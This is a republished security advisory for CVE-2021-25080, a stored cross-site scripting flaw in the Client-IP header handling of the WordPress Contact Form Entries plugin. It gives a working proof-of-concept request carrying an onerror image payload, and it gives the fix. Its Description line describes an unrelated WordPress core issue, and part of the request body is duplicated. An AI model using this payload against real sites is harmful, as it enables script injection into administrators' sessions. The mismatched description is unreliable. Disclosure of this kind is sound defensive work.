Lucene search
+L

WordPress CRM Form Entries Cross Site Scripting

🗓️ 03 Jan 2022 00:00:00Reported by Gaetano Perrone, secsi.ioType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 252 Views

WordPress CRM Form Entries XSS vulnerability in Client IP field allows stored cross site scripting by authenticated user

Related
Code
`Hello, today I disclosed the CVE-2021-25080 vulnerability. Here attached  
technical information:  
  
# References:  
* https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac  
*  
https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/  
  
  
# Description:  
WordPress before 5.2.3 allows XSS in post previews by authenticated users.  
  
  
  
  
# Technical Details and Exploitation:  
CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field.  
When the user uploads a new form, CRM Form Entries checks for the client IP  
in order to save information about the user:  
===============================================================================================================  
public function get_ip(),  
wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388  
==============================================================================================================  
The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is  
stored inside the database.  
  
  
# Proof Of Concept:  
  
Suppose that you have a Contact Form, intercept the POST request and insert  
the following Client-IP header  
===============================================================================================================  
POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback  
HTTP/1.1  
Host: dsp.com:11080  
Content-Length: 1411  
Accept: application/json, text/javascript, */*; q=0.01  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...  
Client-IP: <img src=a onerror=alert(1)>  
  
------WebKitFormBoundaryCuNGXLnhRsdglEAx  
  
Content-Disposition: form-data; name="_wpcf7"  
  
10  
------WebKitFormBoundaryCuNGXLnhRsdglEAx  
Content-Disposition: form-data; name="_wpcf7_version"  
  
5.3.1  
------WebKitFormBoundaryCuNGXLnhRsdglEAx  
Content-Disposition: form-data; name="_wpcf7_locale"  
  
en_US  
------WebKitFormBoundaryCuNGXLnhRsdglEAx  
Content-Disposition: form-data; name="_wpcf7_unit_tag"  
  
wpcf7-f10-p13-o1  
------WebKitFormBoundaryCuNGXLnhRsdglEAx  
Content-Disposition: form-data; name="_wpcf7_container_post"  
  
Content-Disposition: form-data; name="_wpcf7"  
  
10  
------WebKitFormBoundaryCuNGXLnhRsdglEAx  
Content-Disposition: form-data; name="_wpcf7_version"  
  
5.3.1  
------WebKitFormBoundaryCuNGXLnhRsdglEAx  
Content-Disposition: form-data; name="_wpcf7_locale"  
  
en_US  
------WebKitFormBoundaryCuNGXLnhRsdglEAx  
Content-Disposition: form-data; name="_wpcf7_unit_tag"  
  
wpcf7-f10-p13-o1  
------WebKitFormBoundaryCuNGXLnhRsdglEAx  
Content-Disposition: form-data; name="_wpcf7_container_post"  
...  
===============================================================================================================  
The request is acccepted, and the code navigates the section  
$_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database.  
When the administrator clicks on the entry element in the plugin, the XSS  
is triggered.  
  
  
# Solution:  
Upgrade Contact Form Entries to version 1.1.7  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Jan 2022 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.842
252